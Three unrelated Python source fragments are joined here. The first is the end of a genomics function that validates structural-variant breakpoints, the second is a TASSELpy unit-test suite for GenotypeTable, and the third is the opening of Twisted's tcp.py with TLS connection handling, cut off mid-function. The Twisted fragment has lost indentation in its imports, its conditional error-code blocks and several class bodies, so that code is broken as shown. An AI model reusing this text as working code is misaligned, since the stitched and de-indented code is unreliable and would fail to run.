        # Inversions need at least two sufficiently long sub-alignments.
        good_age_records = [age_record for age_record in good_age_records if
                            len(age_record.start1_end1s) >= 2 and min(map(lambda x:abs(x[1]-x[0]),age_record.start1_end1s)) >= min_inv_subalign_len]
    elif sv_type == "DUP":
        good_age_records = [age_record for age_record in good_age_records if
                            len(age_record.start1_end1s) == 2 and min(age_record.ref_flanking_regions) >= 100]
    else:
        pass
    # Add some features to an info dict
    info = defaultdict(int)
    info["BA_NUM_GOOD_REC"] = len(good_age_records)
    if not good_age_records:
        func_logger.warning("No good records found for getting breakpoints")
        return [], dict(info)
    # Record the best (max) value of each quality metric across surviving records.
    for rec in good_age_records:
        info["BA_FLANK_PERCENT"] = int(max(info["BA_FLANK_PERCENT"], rec.flank_percent))
        info["BA_NFRAGS"] = int(max(info["BA_NFRAGS"], rec.nfrags))
        info["BA_NUM_ALT"] = int(max(info["BA_NUM_ALT"], rec.n_alt))
        info["BA_PERCENT_MATCH"] = int(max(info["BA_PERCENT_MATCH"], rec.percent))
    func_logger.info("Found %d good records for getting breakpoints" % (len(good_age_records)))
    func_logger.info("Good records")
    for age_record in good_age_records:
        func_logger.info(str(age_record))
    sv_region = good_age_records[0].contig.sv_region
    # --- Dispatch to the type-specific breakpoint finder ---
    if sv_type == "DEL":
        breakpoints = get_deletion_breakpoints(good_age_records, start=sv_region.pos1 - pad)
    elif sv_type == "INS":
        reference_intervals = get_reference_intervals(good_age_records, start=1, min_interval_len=min_interval_len)
        func_logger.info("Gathered reference intervals as %s" % (str(reference_intervals)))
        breakpoints = get_insertion_breakpoints(good_age_records, reference_intervals,
                                                expected_bp_pos=[pad+pad_ins,max((sv_region.pos2-sv_region.pos1)-pad_ins+pad,0)],
                                                window=age_window,
                                                start=sv_region.pos1 - pad)
    elif sv_type == "INV":
        breakpoints = get_inversion_breakpoints(good_age_records, start=sv_region.pos1 - pad ,pad=pad, min_inv_subalign_len=min_inv_subalign_len, dist_to_expected_bp=dist_to_expected_bp)
    elif sv_type == "DUP":
        breakpoints = get_duplication_breakpoints(good_age_records, start=sv_region.pos1 - pad ,pad=pad, dist_to_expected_bp=dist_to_expected_bp)
    else:
        return [], dict(info)
    func_logger.info("Detected breakpoints as %s" % (str(breakpoints)))
    # Add a few more features related to the breakpoints computed
    info["BA_NUM_BP"] = len(breakpoints)
    # --- Validate the breakpoint count expected for each SV type ---
    if sv_type == "DEL":
        if len(breakpoints) == 2:
            func_logger.info("True deletion interval %s" % (str(breakpoints)))
        else:
            func_logger.info("False deletion interval %s" % (str(breakpoints)))
            return [], dict(info)
    elif sv_type == "INS":
        if len(breakpoints) == 1:
            # if sv_region.pos2 - sv_region.pos1 <= 20:
            #     info["BA_BP_SCORE"] = abs(breakpoints[0][0] - sv_region.pos1)
            #     if abs(breakpoints[0][0] - sv_region.pos1) > 20:
            #         return [], dict(info)
            # else:
            # A single resolved insertion breakpoint must land near one of the
            # soft-clip locations (or the padded region ends as a fallback).
            if not sc_locations:
                sc_locations = [sv_region.pos1 + pad_ins, sv_region.pos2 - pad_ins]
            min_diff = min(map(lambda x: abs(x - breakpoints[0][0]), sc_locations))
            info["BA_BP_SCORE"] = min_diff
            if min_diff > 100:
                func_logger.info("False insertion since resolved breakpoint not close to a soft-clip location")
                return [], dict(info)
            func_logger.info("True insertion interval %s" % (str(breakpoints)))
        else:
            return [], dict(info)
    elif sv_type == "INV":
        if len(breakpoints) == 2:
            func_logger.info("True inversion interval %s" % (str(breakpoints)))
        else:
            func_logger.info("False inversion interval %s" % (str(breakpoints)))
            return [], dict(info)
    elif sv_type == "DUP":
        if len(breakpoints) == 2:
            func_logger.info("True duplication interval %s" % (str(breakpoints)))
        else:
            func_logger.info("False duplication interval %s" % (str(breakpoints)))
            return [], dict(info)
    return breakpoints, dict(info)
| |
import unittest
import javabridge
from javabridge import JavaException, is_instance_of
import numpy as np
from TASSELpy.TASSELbridge import TASSELbridge
# Ensure a JVM is running before the TASSEL wrappers below are imported.
# javabridge.get_env() raises AttributeError when no environment exists and
# AssertionError when the bridge has not been started; either way we start it.
try:
    try:
        javabridge.get_env()
    except AttributeError:
        print("AttributeError: start bridge")
        TASSELbridge.start()
except AssertionError:
    print("AssertionError: start bridge")
    TASSELbridge.start()
except Exception:
    # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate;
    # any other startup failure is fatal for this test module.
    raise RuntimeError("Could not start JVM")
from TASSELpy.net.maizegenetics.dna.WHICH_ALLELE import WHICH_ALLELE
from TASSELpy.net.maizegenetics.dna.snp.GenotypeTable import GenotypeTable
from TASSELpy.net.maizegenetics.dna.map.PositionList import PositionList
from TASSELpy.net.maizegenetics.taxa.TaxaList import TaxaList
from TASSELpy.net.maizegenetics.util.BitSet import BitSet
from TASSELpy.net.maizegenetics.dna.snp.ImportUtils import ImportUtils
from TASSELpy.utils.primativeArray import meta_byte_array, meta_long_array, meta_int_array, javaPrimativeArray
from TASSELpy.javaObj import javaArray
from TASSELpy.net.maizegenetics.dna.map.Chromosome import Chromosome
from TASSELpy.java.lang.Integer import metaInteger
from TASSELpy.java.lang.Long import metaLong
from TASSELpy.java.lang.String import String,metaString
from TASSELpy.java.lang.Byte import metaByte
from TASSELpy.java.lang.Boolean import metaBoolean
from TASSELpy.java.lang.Double import metaDouble
from TASSELpy.net.maizegenetics.dna.snp.depth.AlleleDepth import AlleleDepth
from TASSELpy.data import data_constants
# When True each test prints a short progress message; toggled on in __main__.
debug = False
# JVM class names of the exceptions these tests expect TASSEL to raise,
# used with javabridge.is_instance_of on caught JavaException throwables.
java_imports = {'IllegalStateException': 'java/lang/IllegalStateException',
                'NullPointerException': 'java/lang/NullPointerException',
                'UnsupportedOperationException': 'java/lang/UnsupportedOperationException'}
class GenotypeTableTest(unittest.TestCase):
    """Tests for GenotypeTable.py.

    All tests run against the shared HapMap dataset loaded once in
    setUpClass.  Fixes vs. previous revision: deprecated ``assertEquals``
    replaced by ``assertEqual``, the bare ``except:`` in setUpClass narrowed
    to ``except Exception:``, and Python-2-only ``print`` statements converted
    to the 2/3-compatible call form.
    """
    @classmethod
    def setUpClass(cls):
        # Load data once for the whole class; every test reads cls.data.
        try:
            cls.data = ImportUtils.readGuessFormat(data_constants.SHORT_HMP_FILE)
        except Exception:
            raise ValueError("Could not load test data")
    def test_genotypeArray(self):
        if debug: print("Testing genotypeArray")
        arr = self.data.genotypeArray(0,0)
        self.assertIsInstance(arr,meta_byte_array)
    def test_genotype(self):
        if debug: print("Testing genotype")
        first_site_chrom = self.data.chromosome(0)
        first_site_pos = self.data.chromosomalPosition(0)
        geno1 = self.data.genotype(0,0)
        self.assertIsInstance(geno1, metaByte)
        self.assertEqual(geno1, self.data.genotype(0,first_site_chrom,first_site_pos))
    def test_genotypeRange(self):
        if debug: print("Testing genotypeRange")
        arr = self.data.genotypeRange(0,0,1)
        self.assertIsInstance(arr,meta_byte_array)
    def test_genotypeAllSites(self):
        if debug: print("Testing genotypeAllSites")
        arr = self.data.genotypeAllSites(0)
        self.assertIsInstance(arr,meta_byte_array)
    def test_genotypeAllTaxa(self):
        if debug: print("Testing genotypeAllTaxa")
        arr = self.data.genotypeAllTaxa(0)
        self.assertIsInstance(arr,meta_byte_array)
    def test_allelePresenceForAllSites(self):
        if debug: print("Testing allelePresenceForAllSites")
        bitset_major = self.data.allelePresenceForAllSites(0,WHICH_ALLELE.Major)
        self.assertIsInstance(bitset_major,BitSet)
    def test_allelePresenceForSitesBlock(self):
        if debug: print("Testing allelePresenceForSitesBlock")
        arr = self.data.allelePresenceForSitesBlock(0,WHICH_ALLELE.Major,0,1)
        self.assertIsInstance(arr,meta_long_array)
    def test_haplotypeAllelePresenceForAllSites(self):
        if debug: print("Testing haplotypeAllelePresenceForAllSites")
        try:
            bitset_major = self.data.haplotypeAllelePresenceForAllSites(0,True,WHICH_ALLELE.Major)
            self.assertIsInstance(bitset_major,BitSet)
        except JavaException as e:
            self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
    def test_haplotypeAllelePresenceForAllTaxa(self):
        if debug: print("Testing haplotypeAllelePresenceForAllTaxa")
        try:
            bitset_major = self.data.haplotypeAllelePresenceForAllTaxa(0,True,WHICH_ALLELE.Major)
            self.assertIsInstance(bitset_major,BitSet)
        except JavaException as e:
            self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
    def test_haplotypeAllelePresenceForSitesBlock(self):
        if debug: print("Testing haplotypeAllelePresenceForSitesBlock")
        try:
            arr = self.data.haplotypeAllelePresenceForSitesBlock(0,True,WHICH_ALLELE.Major,
                                                                 0,1)
            self.assertIsInstance(arr,meta_long_array)
        except JavaException as e:
            self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
    def test_genotypeAsString(self):
        if debug: print("Testing genotypeAsString")
        geno1 = self.data.genotypeAsString(0,0)
        geno2 = self.data.genotypeAsString(0,np.int8(0))
        self.assertIsInstance(geno1,metaString)
        self.assertIsInstance(geno2,metaString)
    def test_genotypeAsStringRange(self):
        if debug: print("Testing genotypeAsStringRange")
        genos = self.data.genotypeAsStringRange(0,0,1)
        self.assertIsInstance(genos,metaString)
    def test_genotypeAsStringRow(self):
        if debug: print("Testing genotypeAsStringRow")
        genos = self.data.genotypeAsStringRow(0)
        self.assertIsInstance(genos,metaString)
    def test_genotypeAsStringArray(self):
        if debug: print("Testing genotypeAsStringArray")
        arr = self.data.genotypeAsStringArray(0,0)
        self.assertIsInstance(arr[0],String)
    def test_referenceAllele(self):
        if debug: print("Testing referenceAllele")
        ref = self.data.referenceAllele(0)
        self.assertIsInstance(ref,metaByte)
    def test_referenceAlleles(self):
        if debug: print("Testing referenceAlleles")
        arr = self.data.referenceAlleles(0,1)
        self.assertIsInstance(arr,meta_byte_array)
    def test_referenceAlleleForAllSites(self):
        if debug: print("Testing referenceAlleleForAllSites")
        arr = self.data.referenceAlleleForAllSites()
        self.assertIsInstance(arr,meta_byte_array)
    def test_hasReference(self):
        if debug: print("Testing hasReference")
        self.assertFalse(self.data.hasReference())
    def test_isHeterozygous(self):
        if debug: print("Testing isHeterozygous")
        self.assertIsInstance(self.data.isHeterozygous(0,0),metaBoolean)
    def test_heterozygousCount(self):
        if debug: print("Testing heterozygousCount")
        self.assertIsInstance(self.data.heterozygousCount(0),metaInteger)
    def test_siteName(self):
        if debug: print("Testing siteName")
        self.assertIsInstance(self.data.siteName(0),metaString)
    def test_chromosomeSiteCount(self):
        if debug: print("Testing chromosomeSitecount")
        first_site_chrom = self.data.chromosome(0)
        count = self.data.chromosomeSiteCount(first_site_chrom)
        self.assertIsInstance(count,metaInteger)
    def test_firstLastSiteOfChromosome(self):
        if debug: print("Testing firstLastSiteOfChromosome")
        first_site_chrom = self.data.chromosome(0)
        endpoints = self.data.firstLastSiteOfChromosome(first_site_chrom)
        self.assertIsInstance(endpoints, meta_int_array)
    def test_numberOfTaxa(self):
        if debug: print("Testing numberOfTaxa")
        self.assertIsInstance(self.data.numberOfTaxa(), metaInteger)
    def test_positions(self):
        if debug: print("Testing positions")
        poslist = self.data.positions()
        self.assertIsInstance(poslist, PositionList)
    def test_chromosomalPosition(self):
        if debug: print("Testing chromosomalPosition")
        self.assertIsInstance(self.data.chromosomalPosition(0),metaInteger)
    def test_siteOfPhysicalPosition(self):
        if debug: print("Testing siteOfPhysicalPosition")
        site1 = self.data.siteOfPhysicalPosition(data_constants.SHORT_HMP_FILE_FIRST_POS,
                                                 Chromosome(data_constants.SHORT_HMP_FILE_FIRST_CHROM))
        site2 = self.data.siteOfPhysicalPosition(data_constants.SHORT_HMP_FILE_FIRST_POS,
                                                 Chromosome(data_constants.SHORT_HMP_FILE_FIRST_CHROM),
                                                 data_constants.SHORT_HMP_FILE_FIRST_SITENAME)
        self.assertEqual(site1,0)
        self.assertEqual(site1,site2)
    def test_physicalPosition(self):
        if debug: print("Testing physicalPositions")
        positions = self.data.physicalPositions()
        self.assertIsInstance(positions, meta_int_array)
    def test_chromosomeName(self):
        if debug: print("Testing chromosomeName")
        self.assertEqual(self.data.chromosomeName(0), data_constants.SHORT_HMP_FILE_FIRST_CHROM)
    def test_chromosome(self):
        if debug: print("Testing chromosome")
        chrom1 = self.data.chromosome(0)
        chrom2 = self.data.chromosome(data_constants.SHORT_HMP_FILE_FIRST_CHROM)
        self.assertEqual(chrom1.getName(), data_constants.SHORT_HMP_FILE_FIRST_CHROM)
        self.assertEqual(chrom1,chrom2)
    def test_chromosomes(self):
        if debug: print("Testing chromosomes")
        chroms = self.data.chromosomes()
        self.assertIsInstance(chroms,javaArray)
        self.assertIsInstance(chroms[0], Chromosome)
    def test_numChromosomes(self):
        if debug: print("Testing numChromosomes")
        self.assertIsInstance(self.data.numChromosomes(),metaInteger)
    def test_chromosomesOffsets(self):
        if debug: print("Testing chromosomesOffsets")
        arr = self.data.chromosomesOffsets()
        self.assertIsInstance(arr,meta_int_array)
    def test_hasDepth(self):
        if debug: print("Testing hasDepth")
        self.assertIsInstance(self.data.hasDepth(),metaBoolean)
    def test_hasAlleleProbabilities(self):
        if debug: print("Testing hasAlleleProbabilities")
        self.assertFalse(self.data.hasAlleleProbabilities())
    def test_indelSize(self):
        if debug: print("Testing indelSize")
        self.assertIsInstance(self.data.indelSize(0),metaInteger)
    def test_isIndel(self):
        if debug: print("Testing isIndel")
        self.assertIsInstance(self.data.isIndel(0),metaBoolean)
    def test_isAllPolymorphic(self):
        if debug: print("Testing isAllPolymorphic")
        self.assertIsInstance(self.data.isAllPolymorphic(),metaBoolean)
    def test_isPolymorphic(self):
        if debug: print("Testing isPolymorphic")
        self.assertIsInstance(self.data.isPolymorphic(0),metaBoolean)
    def test_majorAllele(self):
        if debug: print("Testing majorAllele")
        self.assertIsInstance(self.data.majorAllele(0),metaByte)
    def test_majorAlleleAsString(self):
        if debug: print("Testing majorAlleleAsString")
        self.assertIsInstance(self.data.majorAlleleAsString(0),metaString)
    def test_minorAllele(self):
        if debug: print("Testing minorAllele")
        self.assertIsInstance(self.data.minorAllele(0),metaByte)
    def test_minorAlleleAsString(self):
        if debug: print("Testing minorAlleleAsString")
        self.assertIsInstance(self.data.minorAlleleAsString(0),metaString)
    def test_minorAlleles(self):
        if debug: print("Testing minorAlleles")
        self.assertIsInstance(self.data.minorAlleles(0),meta_byte_array)
    def test_alleles(self):
        if debug: print("Testing alleles")
        self.assertIsInstance(self.data.alleles(0), meta_byte_array)
    def test_minorAlleleFrequency(self):
        if debug: print("Testing minorAlleleFrequency")
        self.assertIsInstance(self.data.minorAlleleFrequency(0),metaDouble)
    def test_majorAlleleFrequency(self):
        if debug: print("Testing majorAlleleFrequency")
        self.assertIsInstance(self.data.majorAlleleFrequency(0),metaDouble)
    def test_taxa(self):
        if debug: print("Testing taxa")
        taxa = self.data.taxa()
        self.assertIsInstance(taxa, TaxaList)
    def test_taxaName(self):
        if debug: print("Testing taxaName")
        self.assertIsInstance(self.data.taxaName(0), metaString)
    def test_genomeVersion(self):
        if debug: print("Testing genomeVersion")
        try:
            version = self.data.genomeVersion()
            if version is not None:
                self.assertIsInstance(version, metaString)
        except JavaException as e:
            self.assertTrue(is_instance_of(e.throwable, java_imports['UnsupportedOperationException']))
    def test_isPositiveStrand(self):
        if debug: print("Testing isPositiveStrand")
        self.assertIsInstance(self.data.isPositiveStrand(0),metaBoolean)
    def test_compositeAlignments(self):
        if debug: print("Testing compositeAlignments")
        alns = self.data.compositeAlignments()
        exp_arr_type = javaArray.get_array_type(GenotypeTable)
        self.assertIsInstance(alns, exp_arr_type)
    def test_allelesSortedByFrequency(self):
        if debug: print("Testing allelesSortedByFrequency")
        arr = self.data.allelesSortedByFrequency(0)
        exp_arr_type = javaArray.get_array_type(javaPrimativeArray.get_array_type('int'))
        self.assertIsInstance(arr,exp_arr_type)
    def test_genosSortedByFrequency(self):
        if debug: print("Testing genosSortedByFrequency")
        arr = self.data.genosSortedByFrequency(0)
        self.assertIsInstance(arr[0][0],metaString)
        self.assertIsInstance(arr[1][0],metaInteger)
    def test_isPhased(self):
        if debug: print("Testing isPhased")
        self.assertIsInstance(self.data.isPhased(),metaBoolean)
    def test_retainsRareAlleles(self):
        if debug: print("Testing retainsRareAlleles")
        self.assertIsInstance(self.data.retainsRareAlleles(),metaBoolean)
    def test_alleleDefinitions(self):
        if debug: print("Testing alleleDefinitions")
        arr1 = self.data.alleleDefinitions()
        arr2 = self.data.alleleDefinitions(0)
        self.assertIsInstance(arr1[0][0], metaString)
        self.assertEqual(arr1[0][0], arr2[0])
    def test_diploidAsString(self):
        if debug: print("Testing diploidAsString")
        val = self.data.diploidAsString(0,np.int8(0))
        self.assertIsInstance(val,metaString)
    def test_maxNumAlleles(self):
        if debug: print("Testing maxNumAlleles")
        self.assertIsInstance(self.data.maxNumAlleles(), metaInteger)
    def test_totalGametesNonMissingForSites(self):
        if debug: print("Testing totalGametesNonMissingForSite")
        self.assertIsInstance(self.data.totalGametesNonMissingForSite(0), metaInteger)
    def test_totalNonMissingForSite(self):
        if debug: print("Testing totalNonMissingForSite")
        self.assertIsInstance(self.data.totalNonMissingForSite(0), metaInteger)
    def test_minorAlleleCount(self):
        if debug: print("Testing minorAlleleCount")
        self.assertIsInstance(self.data.minorAlleleCount(0), metaInteger)
    def test_majorAlleleCount(self):
        if debug: print("Testing majorAlleleCount")
        self.assertIsInstance(self.data.majorAlleleCount(0), metaInteger)
    def test_genoCount(self):
        if debug: print("Testing genoCount")
        arr = self.data.genoCounts()
        self.assertIsInstance(arr[0][0], metaString)
        self.assertIsInstance(arr[1][0], metaLong)
    def test_majorMinorCounts(self):
        if debug: print("Testing majorMinorCounts")
        arr = self.data.majorMinorCounts()
        self.assertIsInstance(arr[0][0], metaString)
        self.assertIsInstance(arr[1][0], metaLong)
    def test_totalGametesNonMissingForTaxon(self):
        if debug: print("Testing totalGametesNonMissingForTaxon")
        val = self.data.totalGametesNonMissingForTaxon(0)
        self.assertIsInstance(val, metaInteger)
    def test_heterozygousCountForTaxon(self):
        if debug: print("Testing heterozygousCountForTaxon")
        val = self.data.heterozygousCountForTaxon(0)
        self.assertIsInstance(val, metaInteger)
    def test_totalNonMissingForTaxon(self):
        if debug: print("Testing totalNonMissingForTaxon")
        val = self.data.totalNonMissingForTaxon(0)
        self.assertIsInstance(val, metaInteger)
    def test_depth(self):
        if debug: print("Testing depth")
        depth = self.data.depth()
        self.assertTrue(depth is None or isinstance(depth, AlleleDepth))
    def test_depthForAlleles(self):
        if debug: print("Testing depthForAlleles")
        try:
            arr = self.data.depthForAlleles(0,0)
            self.assertIsInstance(arr[0],metaInteger)
        except JavaException as e:
            self.assertTrue(is_instance_of(e.throwable, java_imports['NullPointerException']))
    def test_allelesBySortType(self):
        if debug: print("Testing allelesBySortType")
        arr = self.data.allelesBySortType(self.data.ALLELE_SORT_TYPE.Reference,0)
        self.assertTrue(arr is None or isinstance(arr, meta_byte_array))
    def test_allelePresenceForAllTaxa(self):
        if debug: print("Testing allelePresenceForAllTaxa")
        bitset = self.data.allelePresenceForAllTaxa(0, WHICH_ALLELE.Major)
        self.assertIsInstance(bitset, BitSet)
if __name__ == "__main__":
    debug = True
    # exit=False stops unittest.main() from raising SystemExit, which made the
    # TASSELbridge.stop() call below unreachable in the original code.
    unittest.main(exit=False)
    TASSELbridge.stop()
| |
# -*- test-case-name: twisted.test.test_tcp -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Various asynchronous TCP/IP classes.
End users shouldn't use this module directly - use the reactor APIs instead.
Maintainer: Itamar Shtull-Trauring
"""
# System Imports
import os
import types
import socket
import sys
import operator
from zope.interface import implements, classImplements
try:
from OpenSSL import SSL
except ImportError:
SSL = None
from twisted.python.runtime import platformType
if platformType == 'win32':
# no such thing as WSAEPERM or error code 10001 according to winsock.h or MSDN
EPERM = object()
from errno import WSAEINVAL as EINVAL
from errno import WSAEWOULDBLOCK as EWOULDBLOCK
from errno import WSAEINPROGRESS as EINPROGRESS
from errno import WSAEALREADY as EALREADY
from errno import WSAECONNRESET as ECONNRESET
from errno import WSAEISCONN as EISCONN
from errno import WSAENOTCONN as ENOTCONN
from errno import WSAEINTR as EINTR
from errno import WSAENOBUFS as ENOBUFS
from errno import WSAEMFILE as EMFILE
# No such thing as WSAENFILE, either.
ENFILE = object()
# Nor ENOMEM
ENOMEM = object()
EAGAIN = EWOULDBLOCK
from errno import WSAECONNRESET as ECONNABORTED
from twisted.python.win32 import formatError as strerror
else:
from errno import EPERM
from errno import EINVAL
from errno import EWOULDBLOCK
from errno import EINPROGRESS
from errno import EALREADY
from errno import ECONNRESET
from errno import EISCONN
from errno import ENOTCONN
from errno import EINTR
from errno import ENOBUFS
from errno import EMFILE
from errno import ENFILE
from errno import ENOMEM
from errno import EAGAIN
from errno import ECONNABORTED
from os import strerror
from errno import errorcode
# Twisted Imports
from twisted.internet import base, address, fdesc
from twisted.internet.task import deferLater
from twisted.python import log, failure, reflect
from twisted.python.util import unsignedID
from twisted.internet.error import CannotListenError
from twisted.internet import abstract, main, interfaces, error
class _SocketCloser(object):
_socketShutdownMethod = 'shutdown'
def _closeSocket(self):
# socket.close() doesn't *really* close if there's another reference
# to it in the TCP/IP stack, e.g. if it was was inherited by a
# subprocess. And we really do want to close the connection. So we
# use shutdown() instead, and then close() in order to release the
# filedescriptor.
skt = self.socket
try:
getattr(skt, self._socketShutdownMethod)(2)
except socket.error:
pass
try:
skt.close()
except socket.error:
pass
class _TLSMixin:
    """
    Mixin combined dynamically with a L{Connection} subclass (see
    L{_getTLSClass}) once C{startTLS} has been called; it replaces the
    plain-socket I/O logic with logic that drives an OpenSSL connection.
    """
    # The TLS wrapper exposes the underlying socket's shutdown under this
    # name; used by _SocketCloser._closeSocket.
    _socketShutdownMethod = 'sock_shutdown'

    # OpenSSL may need to read in order to complete a write (and vice
    # versa), e.g. during handshake/renegotiation; these flags record that
    # internal blocking state, independently of what the user asked for.
    writeBlockedOnRead = 0
    readBlockedOnWrite = 0
    # What the user last requested; restored by _resetReadWrite().
    _userWantRead = _userWantWrite = True

    def getPeerCertificate(self):
        """Return the certificate presented by the TLS peer."""
        return self.socket.get_peer_certificate()

    def doRead(self):
        """
        Read via the TLS layer, translating OpenSSL's want-read/want-write
        signalling into reactor read/write interest changes.
        """
        if self.disconnected:
            # See the comment in the similar check in doWrite below.
            # Additionally, in order for anything other than returning
            # CONNECTION_DONE here to make sense, it will probably be necessary
            # to implement a way to switch back to TCP from TLS (actually, if
            # we did something other than return CONNECTION_DONE, that would be
            # a big part of implementing that feature). In other words, the
            # expectation is that doRead will be called when self.disconnected
            # is True only when the connection has been lost. It's possible
            # that the other end could stop speaking TLS and then send us some
            # non-TLS data. We'll end up ignoring that data and dropping the
            # connection. There's no unit tests for this check in the cases
            # where it makes a difference. The test suite only hits this
            # codepath when it would have otherwise hit the SSL.ZeroReturnError
            # exception handler below, which has exactly the same behavior as
            # this conditional. Maybe that's the only case that can ever be
            # triggered, I'm not sure. -exarkun
            return main.CONNECTION_DONE
        if self.writeBlockedOnRead:
            # The read we were waiting for has arrived; restore the
            # user-requested read/write interest.
            self.writeBlockedOnRead = 0
            self._resetReadWrite()
        try:
            return Connection.doRead(self)
        except SSL.ZeroReturnError:
            # Clean TLS close alert from the peer: orderly end of stream.
            return main.CONNECTION_DONE
        except SSL.WantReadError:
            return
        except SSL.WantWriteError:
            # OpenSSL must write before more can be read; watch for
            # writability instead of readability until that happens.
            self.readBlockedOnWrite = 1
            Connection.startWriting(self)
            Connection.stopReading(self)
            return
        except SSL.SysCallError, (retval, desc):
            if ((retval == -1 and desc == 'Unexpected EOF')
                or retval > 0):
                return main.CONNECTION_LOST
            log.err()
            return main.CONNECTION_LOST
        except SSL.Error, e:
            # Any other TLS-level failure terminates the connection with
            # the error as the reason.
            return e

    def doWrite(self):
        # Retry disconnecting
        if self.disconnected:
            # This case is triggered when "disconnected" is set to True by a
            # call to _postLoseConnection from FileDescriptor.doWrite (to which
            # we upcall at the end of this overridden version of that API). It
            # means that while, as far as any protocol connected to this
            # transport is concerned, the connection no longer exists, the
            # connection *does* actually still exist. Instead of closing the
            # connection in the overridden _postLoseConnection, we probably
            # tried (and failed) to send a TLS close alert. The TCP connection
            # is still up and we're waiting for the socket to become writeable
            # enough for the TLS close alert to actually be sendable. Only
            # then will the connection actually be torn down. -exarkun
            return self._postLoseConnection()
        if self._writeDisconnected:
            return self._closeWriteConnection()

        if self.readBlockedOnWrite:
            # The write OpenSSL wanted is now possible; restore the
            # user-requested read/write interest.
            self.readBlockedOnWrite = 0
            self._resetReadWrite()
        return Connection.doWrite(self)

    def writeSomeData(self, data):
        """
        Write via the TLS layer.  Returns 0 when OpenSSL cannot make
        progress yet, so the data stays buffered for a later attempt.
        """
        try:
            return Connection.writeSomeData(self, data)
        except SSL.WantWriteError:
            return 0
        except SSL.WantReadError:
            # OpenSSL must read before this write can proceed; watch for
            # readability instead of writability until that happens.
            self.writeBlockedOnRead = 1
            Connection.stopWriting(self)
            Connection.startReading(self)
            return 0
        except SSL.ZeroReturnError:
            return main.CONNECTION_LOST
        except SSL.SysCallError, e:
            if e[0] == -1 and data == "":
                # errors when writing empty strings are expected
                # and can be ignored
                return 0
            else:
                return main.CONNECTION_LOST
        except SSL.Error, e:
            return e

    def _postLoseConnection(self):
        """
        Gets called after loseConnection(), after buffered data is sent.

        We try to send an SSL shutdown alert, but if it doesn't work, retry
        when the socket is writable.
        """
        # Here, set "disconnected" to True to trick higher levels into thinking
        # the connection is really gone. It's not, and we're not going to
        # close it yet. Instead, we'll try to send a TLS close alert to shut
        # down the TLS connection cleanly. Only after we actually get the
        # close alert into the socket will we disconnect the underlying TCP
        # connection.
        self.disconnected = True
        if hasattr(self.socket, 'set_shutdown'):
            # If possible, mark the state of the TLS connection as having
            # already received a TLS close alert from the peer. Why do
            # this???
            self.socket.set_shutdown(SSL.RECEIVED_SHUTDOWN)
        return self._sendCloseAlert()

    def _sendCloseAlert(self):
        # Okay, *THIS* is a bit complicated.

        # Basically, the issue is, OpenSSL seems to not actually return
        # errors from SSL_shutdown. Therefore, the only way to
        # determine if the close notification has been sent is by
        # SSL_shutdown returning "done". However, it will not claim it's
        # done until it's both sent *and* received a shutdown notification.

        # I don't actually want to wait for a received shutdown
        # notification, though, so, I have to set RECEIVED_SHUTDOWN
        # before calling shutdown. Then, it'll return True once it's
        # *SENT* the shutdown.

        # However, RECEIVED_SHUTDOWN can't be left set, because then
        # reads will fail, breaking half close.

        # Also, since shutdown doesn't report errors, an empty write call is
        # done first, to try to detect if the connection has gone away.
        # (*NOT* an SSL_write call, because that fails once you've called
        # shutdown)
        try:
            os.write(self.socket.fileno(), '')
        except OSError, se:
            if se.args[0] in (EINTR, EWOULDBLOCK, ENOBUFS):
                # Transient condition: try again when writable.
                return 0
            # Write error, socket gone
            return main.CONNECTION_LOST

        try:
            if hasattr(self.socket, 'set_shutdown'):
                laststate = self.socket.get_shutdown()
                self.socket.set_shutdown(laststate | SSL.RECEIVED_SHUTDOWN)
                done = self.socket.shutdown()
                if not (laststate & SSL.RECEIVED_SHUTDOWN):
                    # Undo the fake RECEIVED_SHUTDOWN so later reads keep
                    # working (half close support).
                    self.socket.set_shutdown(SSL.SENT_SHUTDOWN)
            else:
                #warnings.warn("SSL connection shutdown possibly unreliable, "
                #              "please upgrade to ver 0.XX", category=UserWarning)
                self.socket.shutdown()
                done = True
        except SSL.Error, e:
            return e

        if done:
            self.stopWriting()
            # Note that this is tested for by identity below.
            return main.CONNECTION_DONE
        else:
            # For some reason, the close alert wasn't sent. Start writing
            # again so that we'll get another chance to send it.
            self.startWriting()
            # On Linux, select will sometimes not report a closed file
            # descriptor in the write set (in particular, it seems that if a
            # send() fails with EPIPE, the socket will not appear in the write
            # set). The shutdown call above (which calls down to SSL_shutdown)
            # may have swallowed a write error. Therefore, also start reading
            # so that if the socket is closed we will notice. This doesn't
            # seem to be a problem for poll (because poll reports errors
            # separately) or with select on BSD (presumably because, unlike
            # Linux, it doesn't implement select in terms of poll and then map
            # POLLHUP to select's in fd_set).
            self.startReading()
            return None

    def _closeWriteConnection(self):
        """
        Send the TLS close alert first; only half-close the underlying TCP
        connection once the alert is actually out.
        """
        result = self._sendCloseAlert()

        if result is main.CONNECTION_DONE:
            return Connection._closeWriteConnection(self)

        return result

    # The four start/stop methods below record the user's intent and only
    # forward to the reactor when TLS isn't internally blocked the other way.

    def startReading(self):
        self._userWantRead = True
        if not self.readBlockedOnWrite:
            return Connection.startReading(self)

    def stopReading(self):
        self._userWantRead = False
        if not self.writeBlockedOnRead:
            return Connection.stopReading(self)

    def startWriting(self):
        self._userWantWrite = True
        if not self.writeBlockedOnRead:
            return Connection.startWriting(self)

    def stopWriting(self):
        self._userWantWrite = False
        if not self.readBlockedOnWrite:
            return Connection.stopWriting(self)

    def _resetReadWrite(self):
        # After changing readBlockedOnWrite or writeBlockedOnRead,
        # call this to reset the state to what the user requested.
        if self._userWantWrite:
            self.startWriting()
        else:
            self.stopWriting()

        if self._userWantRead:
            self.startReading()
        else:
            self.stopReading()
class _TLSDelayed(object):
"""
State tracking record for TLS startup parameters. Used to remember how
TLS should be started when starting it is delayed to wait for the output
buffer to be flushed.
@ivar bufferedData: A C{list} which contains all the data which was
written to the transport after an attempt to start TLS was made but
before the buffers outstanding at that time could be flushed and TLS
could really be started. This is appended to by the transport's
write and writeSequence methods until it is possible to actually
start TLS, then it is written to the TLS-enabled transport.
@ivar context: An SSL context factory object to use to start TLS.
@ivar extra: An extra argument to pass to the transport's C{startTLS}
method.
"""
def __init__(self, bufferedData, context, extra):
self.bufferedData = bufferedData
self.context = context
self.extra = extra
def _getTLSClass(klass, _existing={}):
    """
